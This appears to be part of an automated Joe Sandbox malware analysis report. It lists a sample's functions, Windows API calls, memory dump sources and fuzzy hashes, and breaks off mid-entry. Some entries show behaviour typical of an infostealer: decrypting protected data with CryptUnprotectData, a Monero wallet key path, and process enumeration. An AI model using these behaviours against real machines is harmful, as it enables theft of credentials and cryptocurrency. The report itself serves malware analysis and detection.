                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                    • String ID: \*.*
                    • API String ID: 433455689-1173974218
                    • Opcode ID: f79b9658a7bc358fb73a8bbbf483e5017b7b1de0c4f85bfcb4f6b61f08e6d61b
                    • Instruction ID: 90e3a4d72b57a637d0b18a4197533bf50e35b09881c05a56ffea24bb609c76ee
                    • Opcode Fuzzy Hash: f79b9658a7bc358fb73a8bbbf483e5017b7b1de0c4f85bfcb4f6b61f08e6d61b
                    • Instruction Fuzzy Hash: 4D121D729101189ADB18FB60DD96FEE7339AFD4300F5045A9B50AB7091EE346F49CFA2
                    Function 00D277FE Relevance: 7.9, Strings: 5, Instructions: 1698COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 0~T$@N_"$eV^9$|*A$<_?
                    • API String ID: 0-2461846571
                    • Opcode ID: e46f49aa01ab8449c7e77d907c8cbe911ebda1d6128841896545acb627f1796e
                    • Instruction ID: 778c2404e5c646ef02b05d12ed3b96a2b3e4cc46a3715057d96d171bdaad77fc
                    • Opcode Fuzzy Hash: e46f49aa01ab8449c7e77d907c8cbe911ebda1d6128841896545acb627f1796e
                    • Instruction Fuzzy Hash: 04B238F3A0C3049FE308AE2DEC8567AB7E9EF94720F16853DE6C5C3744EA3558058696
                    Function 0095C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                    Download Yara Rule
                    APIs
                    • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0095C871
                    • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0095C87C
                    • lstrcat.KERNEL32(?,00970B46), ref: 0095C943
                    • lstrcat.KERNEL32(?,00970B47), ref: 0095C957
                    • lstrcat.KERNEL32(?,00970B4E), ref: 0095C978
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$BinaryCryptStringlstrlen
                    • String ID:
                    • API String ID: 189259977-0
                    • Opcode ID: 9d143cdc05088bd3fbe3ae84c8453c759d56eccd05a204ada3c95835ba32be87
                    • Instruction ID: 5ea66b762585220e324cf1c557747a10c286e2fcbb496c54fe13ff440e943e32
                    • Opcode Fuzzy Hash: 9d143cdc05088bd3fbe3ae84c8453c759d56eccd05a204ada3c95835ba32be87
                    • Instruction Fuzzy Hash: A0417FB590421ADFDB10DFA0DD89BEEB7B8BB88304F1045A9F509A7280DB745B84CF91
                    Function 00957240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0095724D
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00957254
                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00957281
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 009572A4
                    • LocalFree.KERNEL32(?), ref: 009572AE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                    • String ID:
                    • API String ID: 2609814428-0
                    • Opcode ID: 7e1ebc93952a491b16464c15ff4a3a4c9d5a2bd93c4b7f5efa903730a7482345
                    • Instruction ID: 7c2a349942e16281946b26ea0831334da97e131f3b53b5b2598fc5105454ddc3
                    • Opcode Fuzzy Hash: 7e1ebc93952a491b16464c15ff4a3a4c9d5a2bd93c4b7f5efa903730a7482345
                    • Instruction Fuzzy Hash: 67011275A40308BBDB10DFD4DD4AF9E77B8EB44701F108555FB05BB2C0DA70AA008BA5
                    Function 00969600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                    Download Yara Rule
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0096961E
                    • Process32First.KERNEL32(00970ACA,00000128), ref: 00969632
                    • Process32Next.KERNEL32(00970ACA,00000128), ref: 00969647
                    • StrCmpCA.SHLWAPI(?,00000000), ref: 0096965C
                    • CloseHandle.KERNEL32(00970ACA), ref: 0096967A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                    • String ID:
                    • API String ID: 420147892-0
                    • Opcode ID: 4c126c2ea41c1cc78d2ca468b8f97a0952dc32efaadec6a101684f351d727c1f
                    • Instruction ID: f92e8f2611372717b346dbdba2ac13d5b8fa76eaa251599077d050bb3ad0cd28
                    • Opcode Fuzzy Hash: 4c126c2ea41c1cc78d2ca468b8f97a0952dc32efaadec6a101684f351d727c1f
                    • Instruction Fuzzy Hash: EF010C75A00308ABCB14DFA5CD98BEDB7FCEB48300F104189A906A7240DB749B40CF91
                    Function 00968680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,009705B7), ref: 009686CA
                    • Process32First.KERNEL32(?,00000128), ref: 009686DE
                    • Process32Next.KERNEL32(?,00000128), ref: 009686F3
                      • Part of subcall function 0096A9B0: lstrlen.KERNEL32(?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 0096A9C5
                      • Part of subcall function 0096A9B0: lstrcpy.KERNEL32(00000000), ref: 0096AA04
                      • Part of subcall function 0096A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0096AA12
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                    • CloseHandle.KERNEL32(?), ref: 00968761
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                    • String ID:
                    • API String ID: 1066202413-0
                    • Opcode ID: 2705fa32a49222a1661cd52449438bf134a723dd684b1ec7d4eefc0966a62077
                    • Instruction ID: 2e6acbe6911103f2a7ed0e2024a63106f175f65017d286def46e429c15900483
                    • Opcode Fuzzy Hash: 2705fa32a49222a1661cd52449438bf134a723dd684b1ec7d4eefc0966a62077
                    • Instruction Fuzzy Hash: C6313971901218ABCB24DF95CD45FEEB778EB85700F10429AB50AB31A0DF346A45CFA2
                    Function 00968EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                    Download Yara Rule
                    APIs
                    • CryptBinaryToStringA.CRYPT32(00000000,00955184,40000001,00000000,00000000,?,00955184), ref: 00968EC0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: BinaryCryptString
                    • String ID:
                    • API String ID: 80407269-0
                    • Opcode ID: e9e62fd4157d79536e63aafa5e88ce9e458dafd693c70cc10ad0d50a5d91daee
                    • Instruction ID: 32aa6721a8504b0304bc324f8d4927a407d0f7938b46e109a94487efb822776a
                    • Opcode Fuzzy Hash: e9e62fd4157d79536e63aafa5e88ce9e458dafd693c70cc10ad0d50a5d91daee
                    • Instruction Fuzzy Hash: 78111C74200204BFDB00CFA4D885FA733A9AF89300F109A48F9158B250DB35EC41EBA0
                    Function 00959AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                    Download Yara Rule
                    APIs
                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00954EEE,00000000,00000000), ref: 00959AEF
                    • LocalAlloc.KERNEL32(00000040,?,?,?,00954EEE,00000000,?), ref: 00959B01
                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00954EEE,00000000,00000000), ref: 00959B2A
                    • LocalFree.KERNEL32(?,?,?,?,00954EEE,00000000,?), ref: 00959B3F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: BinaryCryptLocalString$AllocFree
                    • String ID:
                    • API String ID: 4291131564-0
                    • Opcode ID: f52c8496b9b0c9993e88c24ae111aaf40ca02d7da923a532c3eb5c1472899edd
                    • Instruction ID: 9a4ac8466ba734623fa18f6948ecc98912d04455e9221242be5647ee08fe9c4d
                    • Opcode Fuzzy Hash: f52c8496b9b0c9993e88c24ae111aaf40ca02d7da923a532c3eb5c1472899edd
                    • Instruction Fuzzy Hash: B211A4B4240208EFEB10CF64DD95FAA77B9FB89701F208059FD199B390CB75A901CB90
                    Function 00967980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00970E00,00000000,?), ref: 009679B0
                    • RtlAllocateHeap.NTDLL(00000000), ref: 009679B7
                    • GetLocalTime.KERNEL32(?,?,?,?,?,00970E00,00000000,?), ref: 009679C4
                    • wsprintfA.USER32 ref: 009679F3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                    • String ID:
                    • API String ID: 377395780-0
                    • Opcode ID: 46574e4c5b1a31fec4ac9ba1207cf62ed0252b10d0588ec5460cf2ca50fca7d2
                    • Instruction ID: 70be2ecf73c53fcde00bd02cae48598d2e35ac3c152d97f5b4cd5d7d7d9ad83f
                    • Opcode Fuzzy Hash: 46574e4c5b1a31fec4ac9ba1207cf62ed0252b10d0588ec5460cf2ca50fca7d2
                    • Instruction Fuzzy Hash: 891109B2904118ABCB14DFDADE45BBEB7F8FB4CB11F10465AF605A2280E7795940CBB1
                    Function 00967A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,005BE128,00000000,?,00970E10,00000000,?,00000000,00000000), ref: 00967A63
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00967A6A
                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,005BE128,00000000,?,00970E10,00000000,?,00000000,00000000,?), ref: 00967A7D
                    • wsprintfA.USER32 ref: 00967AB7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                    • String ID:
                    • API String ID: 3317088062-0
                    • Opcode ID: 2db8d0c96f368c32a19f6b8f3a89689737e6258816b1fe0db40c20d9551b69ab
                    • Instruction ID: 0e106e7dd639d47b2e99009abd03c09611240a93fce1a13badffbebfc224e0b6
                    • Opcode Fuzzy Hash: 2db8d0c96f368c32a19f6b8f3a89689737e6258816b1fe0db40c20d9551b69ab
                    • Instruction Fuzzy Hash: AF118EB1A45218EBEB208B94DD49FA9BB78FB44721F1047DAE91A932C0DB741A40CF91
                    Function 00963720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                    Download Yara Rule
                    APIs
                    • CoCreateInstance.COMBASE(0096E118,00000000,00000001,0096E108,00000000), ref: 00963758
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 009637B0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharCreateInstanceMultiWide
                    • String ID:
                    • API String ID: 123533781-0
                    • Opcode ID: 7c1f7ef3be0483dbfcc43410914f946cba89e8c38967556e665721285d70763b
                    • Instruction ID: 1878820275aefc22cc05fe3d96dd44dca49c3dd05b1b6d327ae1dee9b79fbdd2
                    • Opcode Fuzzy Hash: 7c1f7ef3be0483dbfcc43410914f946cba89e8c38967556e665721285d70763b
                    • Instruction Fuzzy Hash: 4541F674A00A289FDB24DB58CC95BDBB7B5BB48702F4091D9E608A72D0E771AE85CF50
                    Function 00959B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                    Download Yara Rule
                    APIs
                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00959B84
                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 00959BA3
                    • LocalFree.KERNEL32(?), ref: 00959BD3
                    Memory Dump Source
